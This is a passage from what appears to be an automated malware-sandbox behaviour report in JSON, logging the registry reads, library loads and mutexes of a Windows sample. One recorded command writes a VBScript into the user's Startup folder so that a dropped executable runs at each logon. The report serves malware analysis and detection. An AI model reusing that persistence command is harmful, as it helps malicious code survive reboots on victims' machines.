NT\\CurrentVersion\\GRE_Initialize\\DisableUmpdBufferSizeCheck", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\MS Shell Dlg 2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\MS Sans Serif" ], "write_keys": [], "delete_keys": [], "executed_commands": [ "C:\\Windows\\system32\\cmd.exe /c echo on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: >\"C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs\"", "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" ], "resolved_apis": [], "mutexes": [ "Local\\SM0:4492:168:WilStaging_02", "qazwsxedc", "Local\\SM0:7456:168:WilStaging_02" ], "created_services": [], "started_services": [] }, "enhanced": [ { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,894", "eid": 1, "data": { "file": "MSVCRT.DLL", "pathtofile": null, "moduleaddress": "0x753c0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,894", "eid": 2, "data": { "file": "user32", "pathtofile": null, "moduleaddress": "0x76610000" } }, { "event": "create", "object": "windowshook", "timestamp": "2025-03-02 21:32:27,894", "eid": 3, "data": { "id": "18446744073709551615", "moduleaddress": "0x00000000", "procedureaddress": "0x73289fa0", "module": "" } }, { "event": "create", "object": "windowshook", "timestamp": "2025-03-02 21:32:27,894", "eid": 4, "data": { "id": "5", "moduleaddress": "0x00000000", "procedureaddress": "0x73240e80", "module": "" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,909", "eid": 5, "data": { "file": "imm32.dll", "pathtofile": null, "moduleaddress": "0x75730000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,909", "eid": 6, "data": { "file": "COMCTL32.DLL", "pathtofile": null, "moduleaddress": "0x73910000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,909", "eid": 7, "data": { "file": "COMCTL32.DLL", "pathtofile": null, "moduleaddress": "0x73910000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,909", "eid": 8, "data": { "file": "COMCTL32.DLL", "pathtofile": null, "moduleaddress": "0x73910000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,909", "eid": 9, "data": { "file": "COMCTL32.DLL", "pathtofile": null, "moduleaddress": "0x73910000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,909", "eid": 10, "data": { "file": "COMCTL32.DLL", "pathtofile": null, "moduleaddress": "0x73910000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,909", "eid": 11, "data": { "file": "C:\\Windows\\System32\\uxtheme.dll", "pathtofile": null, "moduleaddress": "0x74e80000" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:27,925", "eid": 12, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:27,925", "eid": 13, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 14, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 15, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 16, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 17, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 18, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 19, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 20, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 21, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 22, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 23, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 24, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 25, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 26, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 27, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 28, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 29, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 30, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 31, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 32, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 33, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 34, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 35, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x75c40000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 36, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x75c40000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 37, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 38, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 39, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 40, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 41, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 42, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 43, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 44, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 45, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 46, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 47, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 48, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 49, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 50, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 51, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 52, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 53, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 54, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 55, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 56, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 57, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 58, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 59, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": "0x76eb0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 60, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 61, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 62, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 63, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 64, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 65, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 66, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 67, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 68, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 69, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 70, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 71, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 72, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 73, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 74, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 75, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 76, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 77, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 78, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 79, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 80, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 81, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 82, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 83, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 84, "data": { "file": "psapi.dll", "pathtofile": null, "moduleaddress": "0x76280000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 85, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 86, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 87, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 88, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 89, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 90, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 91, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 92, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 93, "data": { "file": "api-ms-win-eventing-provider-l1-1-0.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 94, "data": { "file": "api-ms-win-core-synch-l1-2-0.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 95, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 96, "data": { "file": "DDRAW.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 97, "data": { "file": "D3D8.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:27,925", "eid": 98, "data": { "file": "D3D9.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 99, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Category", "content": "4" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 100, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Name", "content": "Local AppData" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 101, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParentFolder", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 102, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Description", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 103, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\RelativePath", "content": "AppData\\Local" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 104, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParsingName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 105, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InfoTip", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 106, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalizedName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 107, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Icon", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 108, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Security", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 109, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResource", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 110, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResourceType", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 111, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalRedirectOnly", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 112, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Roamable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 113, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PreCreate", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 114, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Stream", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 115, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PublishExpandedPath", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 116, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\DefinitionFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 117, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Attributes", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 118, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\FolderTypeID", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 119, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InitFolderHandler", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 120, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData", "content": "%USERPROFILE%\\AppData\\Local" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 121, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", "content": "kernel32.dll" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,003", "eid": 122, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 123, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:28,003", "eid": 124, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es", "content": "{0000002B-57EE-1E5C-00B4-D0000BB1E11E}" } }, { "event": "read", "object": "file", "timestamp": "2025-03-02 21:32:28,284", "eid": 125, "data": { "file": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 126, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 127, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 128, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 129, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 130, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 131, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:28,706", "eid": 